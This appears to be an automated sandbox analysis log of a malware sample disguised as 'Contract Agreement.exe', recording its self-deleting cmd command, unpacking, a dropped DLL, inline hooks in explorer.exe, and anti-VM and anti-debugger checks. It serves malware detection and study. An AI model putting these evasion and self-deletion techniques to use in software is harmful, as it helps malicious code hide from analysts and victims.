          Source: C:\Windows\SysWOW64\cmstp.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Contract Agreement.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Contract Agreement.exeProcess created: C:\Users\user\Desktop\Contract Agreement.exe 'C:\Users\user\Desktop\Contract Agreement.exe'
          Source: C:\Windows\SysWOW64\cmstp.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Contract Agreement.exe'
          Source: C:\Users\user\Desktop\Contract Agreement.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
          Source: Binary string: cmstp.pdbGCTL source: Contract Agreement.exe, 00000001.00000002.687889109.0000000000970000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000003.00000002.916848212.0000000005A00000.00000002.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: Contract Agreement.exe, 00000000.00000003.644430719.000000001EF60000.00000004.00000001.sdmp, Contract Agreement.exe, 00000001.00000002.688088335.0000000000B0F000.00000040.00000001.sdmp, cmstp.exe, 00000004.00000002.907753990.00000000046D0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: Contract Agreement.exe, cmstp.exe
          Source: Binary string: cmstp.pdb source: Contract Agreement.exe, 00000001.00000002.687889109.0000000000970000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 00000003.00000002.916848212.0000000005A00000.00000002.00000001.sdmp

          Data Obfuscation:

          barindex
          Detected unpacking (changes PE section rights)Show sources
          Source: C:\Users\user\Desktop\Contract Agreement.exeUnpacked PE file: 1.2.Contract Agreement.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .text:ER;
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 0_2_00401FDC SetErrorMode,GetModuleHandleA,LoadLibraryA,GetProcAddress,FreeLibrary,SetErrorMode,
          Source: 1hqxmv.dll.0.drStatic PE information: section name: .code
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_004048E9 push ebp; retf
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00417138 push ecx; iretd
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_0040993B pushad ; retf
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_004169DF push eax; iretd
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_0041CEB5 push eax; ret
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_0041CF6C push eax; ret
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_0041CF02 push eax; ret
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_0041CF0B push eax; ret
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A6D0D1 push ecx; ret
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_1_004048E9 push ebp; retf
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_1_00417138 push ecx; iretd
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_1_0040993B pushad ; retf
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_1_004169DF push eax; iretd
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_1_0041CEB5 push eax; ret
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_1_0041CF6C push eax; ret
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_1_0041CF02 push eax; ret
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_1_0041CF0B push eax; ret
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0474D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_02BA48E9 push ebp; retf
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_02BB69DF push eax; iretd
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_02BA993B pushad ; retf
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_02BB7138 push ecx; iretd
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_02BBCEB5 push eax; ret
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_02BBCF0B push eax; ret
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_02BBCF02 push eax; ret
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_02BBCF6C push eax; ret
          Source: C:\Users\user\Desktop\Contract Agreement.exeFile created: C:\Users\user\AppData\Local\Temp\nsg2E21.tmp\1hqxmv.dllJump to dropped file

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Modifies the prolog of user mode functions (user mode inline hooks)Show sources
          Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x82 0x2E 0xE0
          Source: C:\Users\user\Desktop\Contract Agreement.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Contract Agreement.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmstp.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          barindex
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\Contract Agreement.exeRDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\Contract Agreement.exeRDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cmstp.exeRDTSC instruction interceptor: First address: 0000000002BA98E4 second address: 0000000002BA98EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cmstp.exeRDTSC instruction interceptor: First address: 0000000002BA9B5E second address: 0000000002BA9B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\Contract Agreement.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00409A90 rdtsc
          Source: C:\Windows\explorer.exe TID: 2864Thread sleep count: 39 > 30
          Source: C:\Windows\explorer.exe TID: 2864Thread sleep time: -78000s >= -30000s
          Source: C:\Windows\SysWOW64\cmstp.exe TID: 4856Thread sleep time: -75000s >= -30000s
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 0_2_00405301 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 0_2_00405C94 SetErrorMode,SetErrorMode,FindFirstFileA,SetErrorMode,FindClose,
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 0_2_004026BC FindFirstFileA,
          Source: explorer.exe, 00000003.00000002.916677438.00000000058C0000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000003.00000000.669272634.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000003.00000000.662962199.0000000004710000.00000004.00000001.sdmpBinary or memory string: d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&f
          Source: explorer.exe, 00000003.00000002.917092318.0000000006650000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000003.00000000.669272634.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000003.00000000.662962199.0000000004710000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
          Source: explorer.exe, 00000003.00000002.916677438.00000000058C0000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000003.00000000.669566755.000000000A716000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
          Source: explorer.exe, 00000003.00000002.916677438.00000000058C0000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 00000003.00000000.669677507.000000000A784000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
          Source: explorer.exe, 00000003.00000002.916677438.00000000058C0000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\Contract Agreement.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\Contract Agreement.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\cmstp.exeProcess queried: DebugPort
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00409A90 rdtsc
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_0040ACD0 LdrLoadDll,
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 0_2_6FC71000 Rcxlxosdkhvclf,IsDebuggerPresent,DebugBreak,GetTempPathW,lstrcatW,CreateFileW,GetFileSize,VirtualAlloc,ReadFile,VirtualProtect,
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 0_2_00401FDC SetErrorMode,GetModuleHandleA,LoadLibraryA,GetProcAddress,FreeLibrary,SetErrorMode,
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 0_2_02B918A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 0_2_02B91688 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A590AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A4F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A4F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A4F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A19080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A93884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A93884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A140E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A140E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A140E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A3B8E4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A3B8E4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A158EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00AAB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00AAB8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00AAB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00AAB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00AAB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00AAB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A2B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A2B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A2B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A2B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A4002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A4002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A4002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A4002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A4002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A3A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A3A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A3A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A3A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00AE4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00AE4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A97016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A97016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A97016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00AE1074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00AD2073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A30050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A30050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A461A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A461A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00AD49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00AD49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00AD49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00AD49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A969A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A951BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A951BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A951BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A951BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A399BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A399BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A399BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A399BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A399BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A399BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A399BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A399BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A399BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A399BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A399BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A399BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A4A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A3C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A42990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A1B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A1B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A1B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00AA41E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A34120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A34120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A34120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A34120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A34120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A4513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A4513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A19100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A19100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A19100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A1C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A1B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A1B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A3B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A3B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A152A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A152A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A152A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A152A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A152A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A2AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A2AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A4FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A4D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A4D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A42AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00AD4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00AD4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00AD4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00AD4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00AD4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00AD4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00AD4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00AD4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00AD4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00AD4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00AD4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00AD4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00AD4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00AD4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A42ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A54A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A54A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A3A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A3A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A3A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A3A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A3A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A3A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A3A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A3A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A3A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A28A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A15210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A15210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A15210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A15210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A1AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A1AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00ADAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00ADAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A33A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00ACB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00ACB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00AE8A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A5927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A19240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A19240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A19240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A19240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00ADEA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00AA4257 mov eax, dword ptr fs:[00000030h]
